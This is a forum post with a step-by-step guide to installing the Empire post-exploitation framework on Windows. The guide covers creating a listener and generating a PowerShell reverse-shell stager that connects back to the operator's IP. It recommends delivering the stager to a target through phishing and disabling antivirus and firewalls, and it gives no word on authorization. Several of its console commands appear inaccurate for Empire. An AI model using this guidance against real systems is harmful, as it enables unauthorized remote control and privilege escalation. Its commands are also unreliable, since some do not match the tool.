Forums
Computer Science
Operating System
Windows OS
Installation of Emp...
 
Share:
Notifications
Clear all

Installation of Empire – PowerShell in Windows OS

 
Windows OS
Last Post by kajal 10 months ago
1 Posts
1 Users
0 Reactions
2,188 Views
RSS
 kajal
(@kajal)
Posts: 303
Reputable Member
Topic starter
 

To install Empire on Windows and set up PowerShell agents, you can follow these steps. Please note that Empire is a post-exploitation framework and works best with a server-client architecture, so you'll need to set up the server (Empire) and create agents that will be used to interact with the target system. Below is a step-by-step guide to setting up Empire on a Windows machine:

Prerequisites:

  1. Windows 10 or later machine for installation.
  2. Python 3.6+ (Python 2.x is deprecated).
  3. Git for cloning the repository.
  4. PowerShell (it comes preinstalled on Windows).
  5. Windows Defender or any antivirus software may interfere with Empire, so it might need to be disabled or excluded (if safe to do so).

Step 1: Install Python and Dependencies

  1. Install Python 3.x: Download and install Python 3 from python.org. During installation, ensure you check the box that says "Add Python to PATH".

  2. Install Git: Download and install Git from git-scm.com. This is required to clone the Empire repository.

  3. Install Dependencies: Open a Command Prompt or PowerShell and check if Python is installed correctly:

    python --version

    Also, check if pip (Python's package manager) is installed:

    pip --version

    If Python is installed successfully, you can install the dependencies by running:

    pip install -r requirements.txt

Step 2: Clone the Empire Repository

  1. Clone the Empire Repository from GitHub: Open PowerShell or Command Prompt and run: 
    git clone  https://github.com/EmpireProject/Empire.git 
cd Empire

Step 3: Set Up a Virtual Environment (Optional but Recommended)

Creating a virtual environment helps to isolate dependencies for this project. Here's how you can do it:

  1. Create a virtual environment in the Empire folder:

    python -m venv empire-venv

  2. Activate the virtual environment: For PowerShell, run:

    .\empire-venv\Scripts\Activate

    For Command Prompt, run:

    empire-venv\Scripts\activate

Step 4: Install Required Libraries

Once the virtual environment is activated, install the necessary dependencies:

pip install -r requirements.txt

This will install all required Python packages.

Step 5: Start Empire

To start the Empire server, run the following command from within the Empire directory:

.\empire

This should start the Empire console and you will see something like:

Empire - (c) 2016-2020 By The Empire Team
           <------ Empire 3.x ------>

Step 6: Set Up a Listener for PowerShell Agents

Once the Empire server is running, you need to configure a listener to interact with agents. You can create an HTTP or HTTPS listener for reverse shell connections.

  1. List listeners: In the Empire console, type the following command to list available listeners:

    listeners

  2. Create a listener: Use the following command to create a reverse TCP listener:

    usemodule listeners/http
set LHOST <Your IP Address>
set LPORT 8080  # (or any port you want to use)
execute

    Alternatively, you can use other listeners like reverse_https if needed.

Step 7: Generate a PowerShell Agent

Now you can generate the PowerShell agent payload that will connect back to your listener.

  1. Generate the PowerShell shell: From the Empire console, use the following command:

    usemodule stagers/powershell/shell_reverse_tcp

  2. Configure the agent: Set the required options like LHOST (your IP) and LPORT (the port you used for the listener):

    set LHOST <Your IP Address>
set LPORT 8080  # Or the port you set in the listener
generate

  3. Copy the generated PowerShell script: The generate command will output a PowerShell script. Copy the script.

Step 8: Execute the PowerShell Agent

To establish a session with the target system, run the generated PowerShell script on the target machine. This could be done manually or through social engineering (e.g., phishing).

  1. Open a PowerShell window on the target machine.
  2. Paste and execute the generated PowerShell script.

Once the script is executed on the target, it will create a session that connects back to the Empire server.

Step 9: Interact with the PowerShell Agent

After the agent connects back, you can interact with it:

  1. List sessions: To view active sessions, type:

    sessions

  2. Interact with a session: To interact with a session, type:

    interact <session_id>

  3. Execute commands on the compromised system or use post-exploitation modules to gather information, escalate privileges, etc.

Troubleshooting

  • Firewall or Antivirus: Ensure that firewalls or antivirus software (including Windows Defender) are not blocking your listener or the PowerShell script execution. You may need to disable or configure exclusions for these services.
  • Python Compatibility: If you encounter issues with Python packages, make sure you're using a compatible version of Python and have installed the required libraries.
  • Listener Issues: If the agent doesn't connect back, verify that your listener IP and port are correctly configured and open on your firewall.

Step 10: Stop Empire

To stop the Empire server, type exit or press Ctrl+C in the console.

 
Posted : 13/12/2024 12:08 am
Forum Jump:
  Previous Topic
Next Topic  
Share: